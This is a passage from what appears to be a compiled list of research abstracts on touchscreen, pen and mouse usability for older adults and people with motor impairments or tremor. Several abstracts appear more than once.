METHOD: Participants with motor-control disabilities (n = 15) and without (n = 15) completed a four-digit touch screen number entry task in both sitting and standing postures. Button sizes varied from 10 mm to 30 mm (5-mm increments), and button gap was 3 mm or 5 mm. RESULTS: Participants had more misses and took longer to complete the task during standing for smaller button sizes (< 20 mm). At larger button sizes, performance was similar for both sitting and standing. In general, misses, time to complete task, and touch characteristics were increased for standing. Although disability affected performance (misses and timing), similar trends were observed for both groups across posture and button size. CONCLUSION: Standing affects performance at smaller button sizes (< 20 mm). For participants with and without motor-control disabilities, standing led to greater exerted force and impulse. APPLICATION: Along with interface design considerations, environmental conditions should also be considered to improve touch screen accessibility and usability. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involve few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc.
Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: The elderly interacting with a digital agenda through an RFID pen and a touch screen paper_content: Ambient Assisted Living (AAL) aims to enhance quality of life of elder and impaired people. Thanks to the advances in Information and Communication Technologies (ICT), it is now possible not only to support new home services to improve their quality of life, but also to provide them with more natural, simple and multimodal interaction styles. It enables introducing new better-suited interaction styles for performing tasks according to user need, abilities and the usage conditions. In this paper, a digital agenda application is described and tested by a group of elderly users. This customized personal agenda allows elders to create agenda entries, to view calendar entries and a person's telephone without typing any letter or number. Through observation and the capture of data we studied how six participants (ages from 66 to 74) interacted with the personal agenda through a touch screen and an RFID-based interface. The RFID interaction consisted of a sheet-like physical object' the RFID board', and a pen-like object 'the IDBlue pen' that the users used to choose the desired option in the board. Beside the users' satisfaction, interesting results have been found that make us aware of valuable information to enhance their interaction with the digital world, as well as, their quality of life. Moreover, it is shown how a pen-like object and a sheet-like one can be used by the elderly to interact with the digital world. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. 
Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. 
This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involve few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: The elderly interacting with a digital agenda through an RFID pen and a touch screen paper_content: Ambient Assisted Living (AAL) aims to enhance quality of life of elder and impaired people. Thanks to the advances in Information and Communication Technologies (ICT), it is now possible not only to support new home services to improve their quality of life, but also to provide them with more natural, simple and multimodal interaction styles. It enables introducing new better-suited interaction styles for performing tasks according to user need, abilities and the usage conditions.
In this paper, a digital agenda application is described and tested by a group of elderly users. This customized personal agenda allows elders to create agenda entries, to view calendar entries and a person's telephone without typing any letter or number. Through observation and the capture of data we studied how six participants (ages from 66 to 74) interacted with the personal agenda through a touch screen and an RFID-based interface. The RFID interaction consisted of a sheet-like physical object' the RFID board', and a pen-like object 'the IDBlue pen' that the users used to choose the desired option in the board. Beside the users' satisfaction, interesting results have been found that make us aware of valuable information to enhance their interaction with the digital world, as well as, their quality of life. Moreover, it is shown how a pen-like object and a sheet-like one can be used by the elderly to interact with the digital world. --- paper_title: Gestural interfaces for elderly users: Help or hindrance paper_content: In this paper we investigate whether finger gesture input is a suitable input method, especially for older users (60+) with respect to age-related changes in sensory, cognitive and motor abilities. We present a study in which we compare a group of older users to a younger user group on a set of 42 different finger gestures on measures of speed and accuracy. The size and the complexity of the gestures varied systematically in order to find out how these factors interact with age on gesture performance. The results showed that older users are a little slower, but not necessarily less accurate than younger users, even on smaller screen sizes, and across different levels of gesture complexity. This indicates that gesture-based interaction could be a suitable input method for older adults. At least not a hindrance - maybe even a help. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. 
--- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: Tap or touch?: pen-based selection accuracy for the young and old paper_content: The effect of the decline in cognitive, perceptive, and motor abilities on older adults' performance with input devices has been well documented in several experiments. None of these experiments, however, have provided information on the challenges faced by older adults when using pens to interact with handheld computers. To address this need, we conducted a study to learn about the performance of older adults in simple pen-based tasks with handheld computers. The study compared the performance of twenty 18-22 year olds, twenty 50-64 year olds, and twenty 65-84 year olds. We found that for the most part, older adults were able to complete tasks accurately. An exception occurred with the low accuracy rates achieved by 65-84 year old participants when tapping on targets of the same size as the standard radio buttons, checkboxes, and icons on the PocketPC. An alternative selection technique we refer to as "touch" enabled 65-84 year olds to select targets more accurately. This technique did not negatively affect the performance of the other participants. If tapping to select, making standard-sized targets 50 percent larger provided 65-84 year olds with similar advantages to switching to "touch" interactions. The results suggest that "touch" interactions need to be further explored to understand whether they will work in more realistic situations. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. 
Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involve few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs.
Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Comparison between single-touch and multi-touch interaction for older people paper_content: This paper describes a study exploring the multi-touch interaction for older adults. The aim of this experiment was to check the relevance of this interaction versus single-touch interaction to realize object manipulation tasks: move, rotate and zoom. For each task, the user had to manipulate a rectangle and superimpose it to a picture frame. Our study shows that adults and principally older adults had more difficulties to realize these tasks for multi-touch interaction than for single-touch interaction. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: Evaluating swabbing: a touchscreen input method for elderly users with tremor paper_content: Elderly users suffering from hand tremor have difficulties interacting with touchscreens because of finger oscillation. It has been previously observed that sliding one's finger across the screen may help reduce this oscillation. In this work, we empirically confirm this advantage by (1) measuring finger oscillation during different actions and (2) comparing error rate and user satisfaction between traditional tapping and swabbing in which the user slides his finger towards a target on a screen edge to select it. We found that oscillation is generally reduced during sliding. 
Also, compared to tapping, swabbing resulted in improved error rates and user satisfaction. We believe that swabbing will make touchscreens more accessible to senior users with tremor. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: The elderly interacting with a digital agenda through an RFID pen and a touch screen paper_content: Ambient Assisted Living (AAL) aims to enhance quality of life of elder and impaired people. Thanks to the advances in Information and Communication Technologies (ICT), it is now possible not only to support new home services to improve their quality of life, but also to provide them with more natural, simple and multimodal interaction styles. It enables introducing new better-suited interaction styles for performing tasks according to user need, abilities and the usage conditions. In this paper, a digital agenda application is described and tested by a group of elderly users. This customized personal agenda allows elders to create agenda entries, to view calendar entries and a person's telephone without typing any letter or number. Through observation and the capture of data we studied how six participants (ages from 66 to 74) interacted with the personal agenda through a touch screen and an RFID-based interface. The RFID interaction consisted of a sheet-like physical object' the RFID board', and a pen-like object 'the IDBlue pen' that the users used to choose the desired option in the board. Beside the users' satisfaction, interesting results have been found that make us aware of valuable information to enhance their interaction with the digital world, as well as, their quality of life. Moreover, it is shown how a pen-like object and a sheet-like one can be used by the elderly to interact with the digital world. --- paper_title: Gestural interfaces for elderly users: Help or hindrance paper_content: In this paper we investigate whether finger gesture input is a suitable input method, especially for older users (60+) with respect to age-related changes in sensory, cognitive and motor abilities. We present a study in which we compare a group of older users to a younger user group on a set of 42 different finger gestures on measures of speed and accuracy. The size and the complexity of the gestures varied systematically in order to find out how these factors interact with age on gesture performance. The results showed that older users are a little slower, but not necessarily less accurate than younger users, even on smaller screen sizes, and across different levels of gesture complexity. This indicates that gesture-based interaction could be a suitable input method for older adults. At least not a hindrance - maybe even a help. 
--- paper_title: Usability evaluation of numeric entry tasks on keypad type and age. paper_content: This study investigated the effects of age and two keypad types (physical keypad and touch-screen one) on the usability of numeric entry tasks. Twenty four subjects (12 young adults 23–33 years old and 12 older adults 65–76 years old) performed three types of entry tasks: 4-digit, 4-digit of password type, and 11-digit. The dependent variables for the performance were mean entry time per unit stroke and error rate. Subjective ratings for ease of use of each keypad type were collected after the experiment. The mean entry time per unit stroke of the young adults was significantly smaller than that of the older adults. The older adults had significantly different mean entry times per unit stroke on the two keypad types. The error rates between young and older adults were significantly different for the touch-screen keypad. The subjective ratings showed that the participants preferred the touch-screen keypad to the physical keypad. The results showed that the older adults preferred the touch-screen keypad and could operate more quickly, and that tactile feedback is needed for the touch-screen keypad to increase input accuracy. The results of this study can be applied when designing different information technology products to input numbers using one hand. Relevance to industry: Touch-screen technology is increasingly used in ticketing kiosks used in public places such as airports, stations or theaters, and in automated teller machines (ATMs) and cash dispensers (CDs). This paper can be applied to design these products or systems, particularly considering usability improvements for older adults. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design.
--- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: Tap or touch?: pen-based selection accuracy for the young and old paper_content: The effect of the decline in cognitive, perceptive, and motor abilities on older adults' performance with input devices has been well documented in several experiments. None of these experiments, however, have provided information on the challenges faced by older adults when using pens to interact with handheld computers. To address this need, we conducted a study to learn about the performance of older adults in simple pen-based tasks with handheld computers. The study compared the performance of twenty 18-22 year olds, twenty 50-64 year olds, and twenty 65-84 year olds. We found that for the most part, older adults were able to complete tasks accurately. An exception occurred with the low accuracy rates achieved by 65-84 year old participants when tapping on targets of the same size as the standard radio buttons, checkboxes, and icons on the PocketPC. An alternative selection technique we refer to as "touch" enabled 65-84 year olds to select targets more accurately. This technique did not negatively affect the performance of the other participants. If tapping to select, making standard-sized targets 50 percent larger provided 65-84 year olds with similar advantages to switching to "touch" interactions. The results suggest that "touch" interactions need to be further explored to understand whether they will work in more realistic situations. --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. 
Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: A Study on the Icon Feedback Types of Small Touch Screen for the Elderly paper_content: Small touch screens are widely used in applications such as bank ATMs, point-of-sale terminals, ticket vending machines, facsimiles, and home automation in the daily life. It is intuition-oriented and easy to operate. There are a lot of elements that affect the small screen touch performance. One of the essential parts is icon feedback. However, to merely achieve beautiful icon feedback appearance and create interesting interaction experience, many interface designers ignore the real user needs. It is critical for them to trade off the icon feedback type associated with the different users needs in the touch interaction. This is especially important when the user capability is very limited. This paper described a pilot study for identifying factors that determine the icon feedback usability on small touch screen in four older adult Cognitrone groups since current research aimed mostly at general icon guidelines and recommendations and failed to consider and define the specific needs of small touch screen interfaces for the elderly. In this paper, we presented a concept from the focus on human necessity and use a cognitive assessment tool, which is the Cognitrone test, to measure older adult's attention and concentration capability and learn more about how to evaluate and design suitable small screen icon feedback types. Forty-five elderly participants participated. Each subject was asked to complete a battery of Cognitrone tests and divided into 4 groups. Each subject was also requested to perform a set of `continuous touch' usability tasks on small touch screen and comment on open-ended questions.
Results are discussed with respect to the perceptual and cognitive factors that influence older adults in the use of icon feedback on small touch screen. It showed significant associations between icon feedback performance and factors of attention and concentration. However, this interrelation was much stronger for the Group 2 and Group 4, especially for Type B, Type C and Type G. Moreover, consistent with previous research, older participants were less sensitive and required longer time to adapt to the high-detailed icon feedback. These results are discussed in terms of icon feedback design strategies for interface designers. --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. 
Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. 
In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: Evaluating swabbing: a touchscreen input method for elderly users with tremor paper_content: Elderly users suffering from hand tremor have difficulties interacting with touchscreens because of finger oscillation. It has been previously observed that sliding one's finger across the screen may help reduce this oscillation. In this work, we empirically confirm this advantage by (1) measuring finger oscillation during different actions and (2) comparing error rate and user satisfaction between traditional tapping and swabbing in which the user slides his finger towards a target on a screen edge to select it. We found that oscillation is generally reduced during sliding. Also, compared to tapping, swabbing resulted in improved error rates and user satisfaction. We believe that swabbing will make touchscreens more accessible to senior users with tremor. --- paper_title: The elderly interacting with a digital agenda through an RFID pen and a touch screen paper_content: Ambient Assisted Living (AAL) aims to enhance quality of life of elder and impaired people. Thanks to the advances in Information and Communication Technologies (ICT), it is now possible not only to support new home services to improve their quality of life, but also to provide them with more natural, simple and multimodal interaction styles. It enables introducing new better-suited interaction styles for performing tasks according to user need, abilities and the usage conditions. In this paper, a digital agenda application is described and tested by a group of elderly users. This customized personal agenda allows elders to create agenda entries, to view calendar entries and a person's telephone without typing any letter or number. Through observation and the capture of data we studied how six participants (ages from 66 to 74) interacted with the personal agenda through a touch screen and an RFID-based interface. The RFID interaction consisted of a sheet-like physical object' the RFID board', and a pen-like object 'the IDBlue pen' that the users used to choose the desired option in the board. Beside the users' satisfaction, interesting results have been found that make us aware of 